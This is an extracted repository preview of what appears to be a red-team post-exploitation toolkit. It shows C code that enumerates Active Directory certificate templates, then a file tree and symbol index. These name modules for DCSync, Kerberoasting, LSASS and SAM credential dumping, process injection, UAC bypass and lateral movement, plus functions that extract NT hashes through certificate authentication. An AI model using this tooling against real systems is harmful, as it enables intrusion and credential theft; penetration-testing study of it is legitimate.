hr = pEnum->lpVtbl->Next(pEnum, 1, &var, &lFetch);
} // end loop through IObjectIds via enumerator
SAFE_RELEASE(pObjectId);
hr = S_OK;
//internal_printf("\n _adcs_get_CertificateTemplateExtendedKeyUsages SUCCESS.\n");
fail:
OLEAUT32$VariantClear(&var);
return hr;
} // end _adcs_get_CertificateTemplateExtendedKeyUsages
HRESULT _adcs_get_CertificateTemplateSecurity(BSTR bstrDacl)
{
HRESULT hr = S_OK;
BOOL bReturn = TRUE;
PSID pOwner = NULL;
BOOL bOwnerDefaulted = TRUE;
LPWSTR swzStringSid = NULL;
WCHAR swzName[MAX_PATH];
DWORD cchName = MAX_PATH;
WCHAR swzDomainName[MAX_PATH];
DWORD cchDomainName = MAX_PATH;
BOOL bDaclPresent = TRUE;
PACL pDacl = NULL;
BOOL bDaclDefaulted = TRUE;
ACL_SIZE_INFORMATION aclSizeInformation;
SID_NAME_USE sidNameUse;
PSECURITY_DESCRIPTOR pSD = NULL;
ULONG ulSDSize = 0;
// Get the security descriptor
if (NULL == bstrDacl)
{
internal_printf(" N/A\n");
goto fail;
}
bReturn = ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(bstrDacl, SDDL_REVISION_1, (PSECURITY_DESCRIPTOR)(&pSD), &ulSDSize);
CHECK_RETURN_FALSE("ConvertStringSecurityDescriptorToSecurityDescriptorW()", bReturn, hr);
// Get the owner
bReturn = ADVAPI32$GetSecurityDescriptorOwner(pSD, &pOwner, &bOwnerDefaulted);
CHECK_RETURN_FALSE("GetSecurityDescriptorOwner()", bReturn, hr);
internal_printf(" Owner : ");
cchName = MAX_PATH;
MSVCRT$memset(swzName, 0, cchName*sizeof(WCHAR));
cchDomainName = MAX_PATH;
MSVCRT$memset(swzDomainName, 0, cchDomainName*sizeof(WCHAR));
if (ADVAPI32$LookupAccountSidW( NULL, pOwner, swzName, &cchName, swzDomainName, &cchDomainName, &sidNameUse )) { internal_printf("%S\\%S", swzDomainName, swzName); }
else { internal_printf("N/A"); }
// Get the owner's SID
if (ADVAPI32$ConvertSidToStringSidW(pOwner, &swzStringSid)) { internal_printf("\n %S\n", swzStringSid); }
else { internal_printf("\n N/A\n"); }
SAFE_LOCAL_FREE(swzStringSid);
// Get the DACL
bReturn = ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted);
CHECK_RETURN_FALSE("GetSecurityDescriptorDacl()", bReturn, hr);
internal_printf(" Access Rights :\n");
if (FALSE == bDaclPresent) { internal_printf(" N/A\n"); goto fail; }
// Loop through ACEs in ACL
if ( ADVAPI32$GetAclInformation( pDacl, &aclSizeInformation, sizeof(aclSizeInformation), AclSizeInformation ) )
{
for(DWORD dwAceIndex=0; dwAceIndex<aclSizeInformation.AceCount; dwAceIndex++)
{
ACE_HEADER * pAceHeader = NULL;
ACCESS_ALLOWED_ACE* pAce
gitextract_l_k0_oet/ ├── .gitignore ├── AD-BOF/ │ ├── ADCS-BOF/ │ │ ├── ADCS.axs │ │ ├── Makefile │ │ ├── README.md │ │ └── src/ │ │ ├── auth/ │ │ │ └── certi_auth.c │ │ ├── enum/ │ │ │ ├── adcs_enum_com2.c │ │ │ ├── adcs_enum_com2.h │ │ │ ├── base.c │ │ │ ├── certenroll.h │ │ │ └── entry.c │ │ ├── request/ │ │ │ ├── CertCli.h │ │ │ ├── CertPol.h │ │ │ ├── adcs_request.c │ │ │ ├── adcs_request.h │ │ │ ├── base.c │ │ │ ├── certca.h │ │ │ ├── certenroll.h │ │ │ └── entry.c │ │ ├── request_on_behalf/ │ │ │ ├── CertCli.h │ │ │ ├── CertPol.h │ │ │ ├── base.c │ │ │ ├── certenroll.h │ │ │ └── entry.c │ │ └── shadow/ │ │ └── certi_shadow.c │ ├── CMakeLists.txt │ ├── DCSync-BOF/ │ │ ├── LICENSE │ │ ├── Makefile │ │ ├── README.md │ │ ├── _include/ │ │ │ ├── beacon.h │ │ │ ├── dcsync.h │ │ │ └── ldap_common.h │ │ ├── drsuapi/ │ │ │ ├── ms-drsr-custom.c │ │ │ └── ms-drsr.h │ │ ├── src/ │ │ │ ├── dcsync-all.c │ │ │ └── dcsync-single.c │ │ └── util/ │ │ ├── ldap_common.c │ │ ├── ldap_syncall.c │ │ └── rpc-adapter.c │ ├── Kerbeus-BOF/ │ │ ├── CMakeLists.txt │ │ ├── Makefile │ │ ├── README.md │ │ ├── _include/ │ │ │ ├── asn_convert.c │ │ │ ├── asn_decode.c │ │ │ ├── asn_encode.c │ │ │ ├── beacon.h │ │ │ ├── connection.c │ │ │ ├── crypt_b64.c │ │ │ ├── crypt_checksum.c │ │ │ ├── crypt_dec.c │ │ │ ├── crypt_enc.c │ │ │ ├── crypt_key.c │ │ │ ├── functions.c │ │ │ └── kerb_struct.h │ │ ├── asktgs/ │ │ │ └── asktgs.c │ │ ├── asktgt/ │ │ │ └── asktgt.c │ │ ├── asreproasting/ │ │ │ └── asreproasting.c │ │ ├── changepw/ │ │ │ └── changepw.c │ │ ├── describe/ │ │ │ └── describe.c │ │ ├── hash/ │ │ │ └── hash.c │ │ ├── kerberoasting/ │ │ │ └── kerberoasting.c │ │ ├── kerbeus.axs │ │ ├── klist/ │ │ │ └── klist.c │ │ ├── ptt/ │ │ │ └── ptt.c │ │ ├── purge/ │ │ │ └── purge.c │ │ ├── renew/ │ │ │ └── renew.c │ │ ├── s4u/ │ │ │ ├── cross_s4u.c │ │ │ └── s4u.c │ │ └── tgtdeleg/ │ │ └── tgtdeleg.c │ ├── LDAP-BOF/ │ │ ├── CMakeLists.txt │ │ ├── LDAP.axs │ │ ├── LICENSE │ │ ├── Makefile │ │ ├── README.md │ │ ├── _include/ │ │ │ ├── acl_common.h │ │ │ ├── beacon.h │ │ │ └── ldap_common.h │ │ └── src/ │ │ ├── add/ │ │ │ ├── add-ace.c │ │ │ ├── add-attribute.c │ │ │ ├── add-computer.c │ │ │ ├── add-delegation.c │ │ │ ├── add-group.c │ │ │ ├── add-groupmember.c │ │ │ ├── add-ou.c │ │ │ ├── add-rbcd.c │ │ │ ├── add-sidhistory.c │ │ │ ├── add-spn.c │ │ │ ├── add-uac.c │ │ │ └── add-user.c │ │ ├── common/ │ │ │ ├── acl_common.c │ │ │ └── ldap_common.c │ │ ├── get/ │ │ │ ├── get-acl.c │ │ │ ├── get-attribute.c │ │ │ ├── get-computers.c │ │ │ ├── get-delegation.c │ │ │ ├── get-domaininfo.c │ │ │ ├── get-groupmembers.c │ │ │ ├── get-groups.c │ │ │ ├── get-maq.c │ │ │ ├── get-object.c │ │ │ ├── get-rbcd.c │ │ │ ├── get-spn.c │ │ │ ├── get-uac.c │ │ │ ├── get-usergroups.c │ │ │ ├── get-users.c │ │ │ └── get-writable.c │ │ ├── move/ │ │ │ └── move-object.c │ │ ├── remove/ │ │ │ ├── remove-ace.c │ │ │ ├── remove-attribute.c │ │ │ ├── remove-delegation.c │ │ │ ├── remove-groupmember.c │ │ │ ├── remove-object.c │ │ │ ├── remove-rbcd.c │ │ │ ├── remove-spn.c │ │ │ └── remove-uac.c │ │ └── set/ │ │ ├── set-attribute.c │ │ ├── set-delegation.c │ │ ├── set-owner.c │ │ ├── set-password.c │ │ ├── set-spn.c │ │ └── set-uac.c │ ├── Makefile │ ├── README.md │ ├── RelayInformer/ │ │ ├── Makefile │ │ ├── README.md │ │ ├── RelayInformer.axs │ │ ├── common/ │ │ │ ├── base.c │ │ │ ├── beacon.h │ │ │ ├── bofdefs.h │ │ │ ├── hwbp.c │ │ │ └── sql.c │ │ ├── relay-informer-http/ │ │ │ └── entry.c │ │ ├── relay-informer-ldap/ │ │ │ └── entry.c │ │ ├── relay-informer-mssql/ │ │ │ └── entry.c │ │ └── relay-informer-smb/ │ │ └── entry.c │ ├── SQL-BOF/ │ │ ├── CMakeLists.txt │ │ ├── LICENSE │ │ ├── Makefile │ │ ├── README.md │ │ ├── SQL.axs │ │ └── src/ │ │ ├── SQL/ │ │ │ ├── 1434udp/ │ │ │ │ └── entry.c │ │ │ ├── adsi/ │ │ │ │ ├── entry.c │ │ │ │ └── ldapserver.h │ │ │ ├── agentcmd/ │ │ │ │ └── entry.c │ │ │ ├── agentstatus/ │ │ │ │ └── entry.c │ │ │ ├── checkrpc/ │ │ │ │ └── entry.c │ │ │ ├── clr/ │ │ │ │ └── entry.c │ │ │ ├── columns/ │ │ │ │ └── entry.c │ │ │ ├── databases/ │ │ │ │ └── entry.c │ │ │ ├── impersonate/ │ │ │ │ └── entry.c │ │ │ ├── info/ │ │ │ │ └── entry.c │ │ │ ├── links/ │ │ │ │ └── entry.c │ │ │ ├── olecmd/ │ │ │ │ └── entry.c │ │ │ ├── query/ │ │ │ │ └── entry.c │ │ │ ├── rows/ │ │ │ │ └── entry.c │ │ │ ├── search/ │ │ │ │ └── entry.c │ │ │ ├── smb/ │ │ │ │ └── entry.c │ │ │ ├── tables/ │ │ │ │ └── entry.c │ │ │ ├── togglemodule/ │ │ │ │ └── entry.c │ │ │ ├── users/ │ │ │ │ └── entry.c │ │ │ ├── whoami/ │ │ │ │ └── entry.c │ │ │ └── xpcmd/ │ │ │ └── entry.c │ │ └── common/ │ │ ├── base.c │ │ ├── beacon.h │ │ ├── bofdefs.h │ │ ├── sql.c │ │ ├── sql_agent.c │ │ ├── sql_clr.c │ │ └── sql_modules.c │ ├── WebDAVClient/ │ │ ├── EnableWebDAVClient.c │ │ ├── LICENSE │ │ ├── StatusWebDAVClient.c │ │ └── beacon.h │ ├── ad-services.axs │ ├── ad.axs │ ├── adwssearch/ │ │ ├── adws_parser.h │ │ ├── adws_search.c │ │ ├── nbfse.h │ │ ├── nmf.h │ │ └── nns.h │ ├── badtakeover/ │ │ └── BadTakeover.c │ ├── ldapsearch/ │ │ ├── base.c │ │ └── ldapsearch.c │ └── readlaps/ │ ├── base.c │ └── readlaps.c ├── CMakeLists.txt ├── Creds-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── UnderlayCopy/ │ │ ├── README.md │ │ ├── entry.c │ │ └── underlaycopy.h │ ├── askcreds/ │ │ ├── askcreds.c │ │ └── askcreds.h │ ├── cookie-monster/ │ │ ├── LICENSE │ │ ├── Makefile │ │ ├── README.md │ │ ├── adaptix.h │ │ ├── beacon.h │ │ ├── cookie-monster-bof.c │ │ ├── cookie-monster-bof.h │ │ ├── cookie-monster.axs │ │ ├── decrypt.py │ │ └── requirements.txt │ ├── creds.axs │ ├── get-netntlm/ │ │ └── get-netntlm.c │ ├── hashdump/ │ │ ├── hashdump.c │ │ └── hive_parser.c │ ├── lsadump/ │ │ ├── cache.c │ │ ├── include/ │ │ │ ├── cache.h │ │ │ ├── lsadump.h │ │ │ ├── sam.h │ │ │ └── secrets.h │ │ ├── lsadump_helper.c │ │ ├── sam.c │ │ └── secrets.c │ └── nanodump/ │ ├── LICENSE │ ├── Makefile │ ├── README.md │ ├── include/ │ │ ├── adaptix.h │ │ ├── beacon.h │ │ ├── delete_file.h │ │ ├── dinvoke.h │ │ ├── entry.h │ │ ├── handle.h │ │ ├── hw_breakpoint.h │ │ ├── impersonate.h │ │ ├── malseclogon.h │ │ ├── modules.h │ │ ├── nanodump.h │ │ ├── nanodump_ppl_dump_dll.x64.h │ │ ├── nanodump_ppl_dump_dll.x86.h │ │ ├── nanodump_ppl_medic_dll.x64.h │ │ ├── nanodump_ssp_dll.x64.h │ │ ├── nanodump_ssp_dll.x86.h │ │ ├── ntdefs.h │ │ ├── output.h │ │ ├── pipe.h │ │ ├── ppl/ │ │ │ ├── cleanup.h │ │ │ ├── ppl.h │ │ │ ├── ppl_dump.h │ │ │ ├── ppl_medic.h │ │ │ ├── ppl_medic_client.h │ │ │ ├── ppl_medic_dll.h │ │ │ └── ppl_utils.h │ │ ├── shtinkering.h │ │ ├── spoof_callstack.h │ │ ├── ssp/ │ │ │ ├── ssp.h │ │ │ └── ssp_utils.h │ │ ├── ssp.h │ │ ├── syscalls.h │ │ ├── token_priv.h │ │ ├── utils.h │ │ └── werfault.h │ ├── nanodump.axs │ ├── scripts/ │ │ ├── randomize_sw2_seed.py │ │ └── restore_signature │ └── source/ │ ├── bin2c.c │ ├── delete_file.c │ ├── dinvoke.c │ ├── entry.c │ ├── handle.c │ ├── hw_breakpoint-asm.asm │ ├── hw_breakpoint.c │ ├── impersonate.c │ ├── malseclogon.c │ ├── modules.c │ ├── nanodump.c │ ├── output.c │ ├── pipe.c │ ├── ppl/ │ │ ├── cleanup.c │ │ ├── ppl.c │ │ ├── ppl_dump.c │ │ ├── ppl_medic.c │ │ ├── ppl_medic_client.c │ │ ├── ppl_medic_dll.c │ │ └── ppl_utils.c │ ├── restore_signature.c │ ├── shtinkering.c │ ├── spoof_callstack-asm.asm │ ├── spoof_callstack.c │ ├── ssp/ │ │ ├── ssp.c │ │ └── ssp_utils.c │ ├── syscalls-asm.asm │ ├── syscalls.c │ ├── token_priv.c │ ├── utils.c │ └── werfault.c ├── Dockerfile ├── Elevation-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── elevate.axs │ ├── getsystem_token/ │ │ └── getsystem_token.c │ ├── potato-dcom/ │ │ ├── DCOMPotato.cpp │ │ └── bofdefs.h │ ├── printspoofer/ │ │ └── printspoofer.c │ ├── uac_regshellcmd/ │ │ └── RegistryShellCommandBOF.c │ └── uac_sspi/ │ └── SspiUacBypassBOF.cpp ├── Execution-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── No-Consolation/ │ │ ├── LICENSE │ │ ├── Makefile │ │ ├── README.md │ │ ├── include/ │ │ │ ├── apisetlookup.h │ │ │ ├── beacon.h │ │ │ ├── bofdefs.h │ │ │ ├── console.h │ │ │ ├── entry.h │ │ │ ├── hwbp.h │ │ │ ├── loader.h │ │ │ ├── output.h │ │ │ ├── peb.h │ │ │ ├── runner.h │ │ │ └── utils.h │ │ ├── no_consolation.axs │ │ └── source/ │ │ ├── apisetlookup.c │ │ ├── console.c │ │ ├── entry.c │ │ ├── hwbp.c │ │ ├── loader.c │ │ ├── peb.c │ │ ├── runner.c │ │ └── utils.c │ ├── README.md │ ├── execute-assembly/ │ │ ├── inlineExecute-Assembly.c │ │ └── inlineExecute-Assembly.h │ └── execution.axs ├── Injection-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── inject.axs │ ├── inject_32to64/ │ │ └── inject_32to64.c │ ├── inject_cfg/ │ │ └── inject_cfg.c │ ├── inject_poolparty/ │ │ ├── 1.h │ │ ├── 2.h │ │ ├── 3.h │ │ ├── 4.h │ │ ├── 5.h │ │ ├── 6.h │ │ ├── 7.h │ │ ├── 8.h │ │ ├── PoolParty.h │ │ └── inject_poolparty.c │ └── inject_sec/ │ ├── inject_sec.c │ └── libc.h ├── LICENSE ├── LateralMovement-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── lateral.axs │ ├── psexec/ │ │ └── psexec.c │ ├── runas/ │ │ └── runas.c │ ├── runas_sess_IHxExec/ │ │ ├── bofdefs.h │ │ └── ihxexec.c │ ├── scshell/ │ │ └── scshell.c │ ├── token_make/ │ │ └── token_make.c │ ├── token_steal/ │ │ └── token_steal.c │ └── winrm-client/ │ └── winrm.cpp ├── Makefile ├── Postex-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── SauronEyeBOF/ │ │ ├── entry.c │ │ └── sauroneye.h │ ├── ScreenshotBOF/ │ │ └── entry.c │ ├── firewallrule/ │ │ ├── addfirewallrule.c │ │ └── firewallrule.h │ └── postex.axs ├── Process-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── findobjects/ │ │ ├── FindModule.c │ │ ├── FindObjects.h │ │ ├── FindProcHandle.c │ │ ├── Syscalls-WoW64.h │ │ └── Syscalls.h │ ├── process/ │ │ ├── Syscalls-WoW64.h │ │ ├── Syscalls.h │ │ ├── base.c │ │ └── psc.c │ ├── process.axs │ └── procfreeze/ │ └── procfreeze.c ├── README.md ├── SAL-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── arp/ │ │ ├── arp.c │ │ └── base.c │ ├── cacls/ │ │ ├── base.c │ │ ├── cacls.c │ │ └── defines.h │ ├── dir/ │ │ ├── base.c │ │ ├── dir.c │ │ └── queue.c │ ├── env/ │ │ ├── base.c │ │ └── env.c │ ├── ipconfig/ │ │ ├── base.c │ │ └── ipconfig.c │ ├── listdns/ │ │ ├── base.c │ │ └── listdns.c │ ├── netstat/ │ │ ├── base.c │ │ └── netstat.c │ ├── nslookup/ │ │ ├── base.c │ │ └── nslookup.c │ ├── privcheck/ │ │ ├── alwaysinstallelevated.c │ │ ├── autologon.c │ │ ├── credentialmanager.c │ │ ├── download_vulnerable_driver_list.py │ │ ├── hijackablepath.c │ │ ├── modifiableautorun.c │ │ ├── modifiablesvc.c │ │ ├── privcheck_all.c │ │ ├── pshistory.c │ │ ├── tokenprivileges.c │ │ ├── uacstatus.c │ │ ├── unattendfiles.c │ │ ├── unquotedsvcpath.c │ │ ├── vulndrivers.h │ │ └── vulnerabledrivers.c │ ├── routeprint/ │ │ ├── base.c │ │ └── routeprint.c │ ├── sal.axs │ ├── uptime/ │ │ ├── base.c │ │ └── uptime.c │ ├── useridletime/ │ │ ├── base.c │ │ └── useridletime.c │ └── whoami/ │ ├── base.c │ └── whoami.c ├── SAR-BOF/ │ ├── CMakeLists.txt │ ├── Makefile │ ├── README.md │ ├── nbtscan/ │ │ ├── nbtscan.c │ │ └── nbtscan.h │ ├── quser/ │ │ ├── base.c │ │ └── quser.c │ ├── sar.axs │ ├── smartscan/ │ │ └── portscan_simple.c │ └── taskhound/ │ └── taskhound.c ├── _include/ │ ├── adaptix.h │ ├── beacon.h │ └── bofdefs.h ├── add_agent.sh ├── docker-compose.yml └── extension-kit.axs
Showing preview only (350K chars total). Download the full file or copy to clipboard to get everything.
SYMBOL INDEX (4356 symbols across 312 files)
FILE: AD-BOF/ADCS-BOF/src/auth/certi_auth.c
type WCHAR (line 19) | typedef WCHAR OLECHAR;
type OLECHAR (line 20) | typedef OLECHAR* LPOLESTR;
type OLECHAR (line 21) | typedef OLECHAR* BSTR;
type sockaddr (line 105) | struct sockaddr
type berval (line 313) | struct berval
type KERB_ECRYPT (line 353) | typedef struct _KERB_ECRYPT {
function EncodeLength (line 382) | static int EncodeLength(BYTE* buf, int len) {
function DecodeLength (line 405) | static int DecodeLength(BYTE* data, int offset, int* length) {
function BYTE (line 420) | static BYTE* BuildSequence(BYTE* content, int contentLen, int* outLen) {
function BYTE (line 437) | static BYTE* BuildInteger(int value, int* outLen) {
function BYTE (line 466) | static BYTE* BuildIntegerFromBytes(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 490) | static BYTE* BuildOctetString(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 507) | static BYTE* BuildBitString(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 525) | static BYTE* BuildContextTag(int tagNum, BYTE* content, int contentLen, ...
function BYTE (line 542) | static BYTE* BuildApplication(int appNum, BYTE* content, int contentLen,...
function BYTE (line 559) | static BYTE* BuildGeneralString(const char* str, int* outLen) {
function BYTE (line 577) | static BYTE* BuildGeneralizedTime(const char* timeStr, int* outLen) {
function BYTE (line 591) | static BYTE* CombineBytes(BYTE** arrays, int* lengths, int count, int* o...
function BYTE (line 615) | static BYTE* BuildPrincipalName(int nameType, const char* name1, const c...
function BYTE (line 662) | static BYTE* BuildKdcReqBody(const char* user, const char* realm, int* o...
type BigInt (line 776) | typedef struct {
function bigint_zero (line 782) | static void bigint_zero(BigInt* n) {
function bigint_from_bytes (line 788) | static void bigint_from_bytes(BigInt* n, const BYTE* data, int dataLen) {
function bigint_to_bytes (line 806) | static void bigint_to_bytes(BigInt* n, BYTE* out, int outLen) {
function bigint_cmp (line 818) | static int bigint_cmp(BigInt* a, BigInt* b) {
function bigint_sub (line 832) | static void bigint_sub(BigInt* result, BigInt* a, BigInt* b) {
function bigint_mul (line 852) | static void bigint_mul(BigInt* result, BigInt* a, BigInt* b) {
function bigint_get_bit (line 873) | static int bigint_get_bit(BigInt* n, int pos) {
function bigint_bit_length (line 881) | static int bigint_bit_length(BigInt* n) {
function bigint_mod (line 896) | static void bigint_mod(BigInt* result, BigInt* a, BigInt* p) {
function bigint_modpow (line 968) | static void bigint_modpow(BigInt* result, BigInt* base, BigInt* exp, Big...
function GenerateDHKeys (line 1002) | static void GenerateDHKeys(HCRYPTPROV hProv) {
function BYTE (line 1022) | static BYTE* BuildDhSubjectPublicKeyInfo(int* outLen) {
function BYTE (line 1080) | static BYTE* BuildPKAuthenticator(const char* user, const char* realm,
function BYTE (line 1138) | static BYTE* BuildAuthPack(const char* user, const char* realm,
function BYTE (line 1174) | static BYTE* BuildCmsSignedData(PCCERT_CONTEXT pCert, BYTE* content, int...
function BYTE (line 1261) | static BYTE* BuildPaPkAsReq(PCCERT_CONTEXT pCert, BYTE* authPack, int au...
function BYTE (line 1297) | static BYTE* BuildPkinitAsReq(PCCERT_CONTEXT pCert, const char* user, co...
function BYTE (line 1439) | static BYTE* SendToKdc(const char* kdcHost, int port, BYTE* data, int da...
function BYTE (line 1528) | static BYTE* KerberosDecrypt(int eType, int keyUsage, BYTE* key, int key...
function BYTE (line 1603) | static BYTE* KerberosEncrypt(int eType, int keyUsage, BYTE* key, int key...
type KERB_CHECKSUM (line 1671) | typedef struct _KERB_CHECKSUM {
function BYTE (line 1690) | static BYTE* ComputeKerberosChecksum(BYTE* key, int keyLen, BYTE* data, ...
function OutputKirbi (line 1775) | static void OutputKirbi(BYTE* ticket, int ticketLen, BYTE* sessionKey, i...
function BYTE (line 2079) | static BYTE* ExtractTicketFromAsRep(BYTE* asRep, int asRepLen, int* tick...
function BYTE (line 2140) | static BYTE* BuildU2UAuthenticator(const char* user, const char* realm, ...
function BYTE (line 2255) | static BYTE* BuildU2UApReq(BYTE* ticket, int ticketLen, BYTE* encAuthent...
function BYTE (line 2344) | static BYTE* BuildU2UTgsReq(const char* user, const char* realm, BYTE* t...
function BYTE (line 2573) | static BYTE* ExtractTicketEncPartFromTgsRep(BYTE* tgsRep, int tgsRepLen,...
function BYTE (line 2669) | static BYTE* ExtractPacFromEncTicketPart(BYTE* encTicketPart, int encTic...
function BYTE (line 2710) | static BYTE* ExtractPacFromAuthData(BYTE* authData, int authDataLen, int...
function ParsePacAndExtractNtHash (line 2778) | static void ParsePacAndExtractNtHash(BYTE* pac, int pacLen, BYTE* replyK...
function ProcessTgsRep (line 2822) | static void ProcessTgsRep(BYTE* tgsRep, int tgsRepLen, BYTE* sessionKey,...
function PerformU2U (line 2883) | static void PerformU2U(const char* kdcHost, const char* user, const char...
function BYTE (line 2916) | static BYTE* ExtractEncPartFromAsRep(BYTE* asRep, int asRepLen, int* cip...
function BYTE (line 2984) | static BYTE* ExtractSessionKey(BYTE* decrypted, int decryptedLen, int* k...
function BYTE (line 3044) | static BYTE* ExtractPaPacCredentials(BYTE* asRep, int asRepLen, int* cre...
function ParsePacCredentialData (line 3157) | static void ParsePacCredentialData(BYTE* data, int dataLen) {
function ComputeSha1 (line 3245) | static void ComputeSha1(BYTE* data, int dataLen, BYTE* hash) {
function KTruncate (line 3261) | static void KTruncate(int k, BYTE* x, int xLen, BYTE* result) {
function DeriveSessionKey (line 3286) | static void DeriveSessionKey(BYTE* sharedSecret, int secretLen, BYTE* se...
function BYTE (line 3309) | static BYTE* ExtractKdcDhPublicKey(BYTE* asRep, int asRepLen, int* keyLe...
function BYTE (line 3424) | static BYTE* ExtractServerDhNonce(BYTE* asRep, int asRepLen, int* nonceL...
function ProcessAsRep (line 3483) | static void ProcessAsRep(BYTE* asRep, int asRepLen, PCCERT_CONTEXT pCert,
function PCCERT_CONTEXT (line 3653) | static PCCERT_CONTEXT LoadCertificateFromBase64(const char* base64Pfx, c...
function PCCERT_CONTEXT (line 3718) | static PCCERT_CONTEXT LoadCertificateFromBytes(const BYTE* pfxBytes, int...
function GetKdcForDomain (line 3759) | static void GetKdcForDomain(const char* domain, char* kdcHost, int kdcHo...
function my_strcmp (line 3780) | int my_strcmp(const char *s1, const char *s2)
function PkinitUnPAC (line 3789) | void PkinitUnPAC(BYTE* pfxBytes, int pfxLen, char* pfxBase64, char* pass...
function go (line 3941) | void go(char* args, int alen) {
FILE: AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.c
type HRESULT (line 17) | typedef HRESULT WINAPI (*CAEnumFirstCA_t)(IN LPCWSTR wszScope, IN DWORD ...
type HRESULT (line 18) | typedef HRESULT WINAPI (*CAEnumNextCA_t)(IN LPVOID hPrevCA, OUT LPVOID *...
type HRESULT (line 19) | typedef HRESULT WINAPI (*CACloseCA_t)(IN LPVOID hCA);
type DWORD (line 20) | typedef DWORD WINAPI (*CACountCAs_t)(IN LPVOID hCAInfo);
type LPCWSTR (line 21) | typedef LPCWSTR WINAPI (*CAGetDN_t)(IN LPVOID hCAInfo);
type HRESULT (line 22) | typedef HRESULT WINAPI (*CAGetCAProperty_t)(IN LPVOID hCAInfo, IN LPCWST...
type HRESULT (line 23) | typedef HRESULT WINAPI (*CAFreeCAProperty_t)(IN LPVOID hCAInfo, IN PZPWS...
type HRESULT (line 24) | typedef HRESULT WINAPI (*CAGetCAFlags_t)(IN LPVOID hCAInfo, OUT DWORD *...
type HRESULT (line 25) | typedef HRESULT WINAPI (*CAGetCACertificate_t)(IN LPVOID hCAInfo, OUT PC...
type HRESULT (line 26) | typedef HRESULT WINAPI (*CAGetCAExpiration_t)(IN LPVOID hCAInfo, OUT DWO...
type HRESULT (line 27) | typedef HRESULT WINAPI (*CAGetCASecurity_t)(IN LPVOID hCAInfo, OUT PSECU...
type HRESULT (line 28) | typedef HRESULT WINAPI (*CAGetAccessRights_t)(IN LPVOID hCAInfo, IN DWOR...
type HRESULT (line 29) | typedef HRESULT WINAPI (*CAEnumCertTypesForCA_t)(IN LPVOID hCAInfo, IN D...
type HRESULT (line 30) | typedef HRESULT WINAPI (*CAEnumCertTypes_t)(IN DWORD dwFlags, OUT LPVOID...
type HRESULT (line 31) | typedef HRESULT WINAPI (*CAEnumNextCertType_t)(IN LPVOID hPrevCertType, ...
type DWORD (line 32) | typedef DWORD WINAPI (*CACountCertTypes_t)(IN LPVOID hCertType);
type HRESULT (line 33) | typedef HRESULT WINAPI (*CACloseCertType_t)(IN LPVOID hCertType);
type HRESULT (line 34) | typedef HRESULT WINAPI (*CAGetCertTypeProperty_t)(IN LPVOID hCertType, I...
type HRESULT (line 35) | typedef HRESULT WINAPI (*CAGetCertTypePropertyEx_t)(IN LPVOID hCertType,...
type HRESULT (line 36) | typedef HRESULT WINAPI (*CAFreeCertTypeProperty_t)(IN LPVOID hCertType, ...
type HRESULT (line 37) | typedef HRESULT WINAPI (*CAGetCertTypeExtensionsEx_t)(IN LPVOID hCertTyp...
type HRESULT (line 38) | typedef HRESULT WINAPI (*CAFreeCertTypeExtensions_t)(IN LPVOID hCertType...
type HRESULT (line 39) | typedef HRESULT WINAPI (*CAGetCertTypeFlagsEx_t)(IN LPVOID hCertType, IN...
type HRESULT (line 40) | typedef HRESULT WINAPI (*CAGetCertTypeExpiration_t)(IN LPVOID hCertType,...
type HRESULT (line 41) | typedef HRESULT WINAPI (*CACertTypeGetSecurity_t)(IN LPVOID hCertType, O...
type HRESULT (line 42) | typedef HRESULT WINAPI (*caTranslateFileTimePeriodToPeriodUnits_t)(IN FI...
type HRESULT (line 43) | typedef HRESULT WINAPI (*CAGetCertTypeAccessRights_t)(IN LPVOID hCertTyp...
type PCCERT_CONTEXT (line 74) | typedef PCCERT_CONTEXT WINAPI (*CertCreateCertificateContext_t)(DWORD dw...
type DWORD (line 75) | typedef DWORD WINAPI (*CertGetNameStringW_t)(PCCERT_CONTEXT pCertContext...
type WINBOOL (line 76) | typedef WINBOOL WINAPI (*CertGetCertificateContextProperty_t)(PCCERT_CON...
type WINBOOL (line 77) | typedef WINBOOL WINAPI (*CertGetCertificateChain_t)(HCERTCHAINENGINE hCh...
type VOID (line 78) | typedef VOID WINAPI (*CertFreeCertificateChain_t)(PCCERT_CHAIN_CONTEXT p...
type BSTR (line 87) | typedef BSTR WINAPI (*SysAllocString_t)(const OLECHAR *);
type UINT (line 88) | typedef UINT WINAPI (*SysStringLen_t)(BSTR);
type HRESULT (line 102) | typedef HRESULT WINAPI (*CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCo...
type HRESULT (line 103) | typedef HRESULT WINAPI (*CoUninitialize_t)(void);
function HRESULT (line 180) | HRESULT adcs_enum_com2()
function HRESULT (line 201) | HRESULT _adcs_get_PolicyServerListManager()
function HRESULT (line 249) | HRESULT _adcs_get_PolicyServerUrl(IX509PolicyServerUrl * pPolicyServerUrl)
function HRESULT (line 283) | HRESULT _adcs_get_EnrollmentPolicyServer(BSTR bstrPolicyServerUrl, BSTR ...
function HRESULT (line 365) | HRESULT _adcs_get_CertificationAuthority(ICertificationAuthority * pCert...
function HRESULT (line 434) | HRESULT _adcs_get_CertificationAuthorityCertificate(VARIANT* lpvarCertif...
function HRESULT (line 564) | HRESULT _adcs_get_CertificationAuthorityWebServers(VARIANT* lpvarWebServ...
function HRESULT (line 626) | HRESULT _adcs_get_CertificationAuthoritySecurity(BSTR bstrDacl)
function HRESULT (line 835) | HRESULT _adcs_get_CertificationAuthorityCertificateTypes(VARIANT* lpvarA...
function HRESULT (line 867) | HRESULT _adcs_get_CertificateTemplate(IX509CertificateTemplate * pCertif...
function HRESULT (line 977) | HRESULT _adcs_get_CertificateTemplateExtendedKeyUsages(VARIANT* lpvarExt...
